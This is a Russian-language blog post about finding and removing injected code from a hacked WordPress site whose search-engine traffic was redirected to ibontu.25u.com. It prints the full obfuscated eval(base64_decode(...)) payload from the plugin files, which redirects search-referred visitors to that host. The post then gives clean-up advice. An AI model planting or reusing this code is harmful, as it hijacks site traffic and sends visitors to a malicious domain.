На одном из сайтов клиента упала (вернее прекратилась совсем) выдача с Яндекса и Гугла.
Оказалось, что при клике по ссылке в выдаче поисковиков происходил редирект на сайт ibontu.25u.com и в результате отсутствовали переходы с Яндекса и Гугла на сайт клиента.
При этом если в адресной строке браузера ввести ссылку на запись сайта, то редиректа нет.
Первое что я проверила, файл .htaccess — как ни странно он был совершенно чистым, без каких-либо даже намеков на лишний код.
Далее я просмотрела файловую структуру и убедилась в том, нет «лишних файлов».
Затем я обновила версию вордпресс и заменила тему. Обычно это всегда помогало. Но! Оказалось это только замедлило решение задачи. Редирект продолжался.
Просмотрела файлы плагинов (которые не были обновлены) и оказалось, что почти в каждом файле .php присутствовал следующий код:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWy
dIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCdd
Ow0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZC
Ahc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsI
nlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJl
ZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9
yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
JiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZ
WdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLioKVwmbHJcPS8iLCRyZ
WZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFwc2EvIiwkc
mVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXI
sImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yIC
FzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0d
HA6Ly9pYm9udHUuMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
Код присутствовал 1, 2, а то и много раз по всему файлу.
Вот такой вирус!
Что делать?
Почистить эту грязь любым доступным способом.
Я скачала все содержимое с хостинга на диск, и почистила с помощью @Text Replacer. Затем залила обратно.
Все сразу же восстановилось!
Можно воспользоваться доступом по SSH, если у вас он есть.
Так же советую включить Файлы логов Apache (у клиента было выключено) и поменять все пароли.
На просторах интернета так же советуют установить плагин для WP, который проверяет целостность файлов и если кто-то внедрит вредоносный код на сайт, в админ-панели появляется информация в какой файл добавлен вирус. Проверку проходят только .php файлы , а JS нет. Я пока не тестировала его. Вот ссылка на блог автора: http://blog.portal.kharkov.ua/2008/06/27/belavir/
Нам этом закругляюсь, Надеюсь мой пост был полезен Вам.
Буду рада любым комментариям, делитесь опытом или задавайте вопросы. Вместе мы сила!
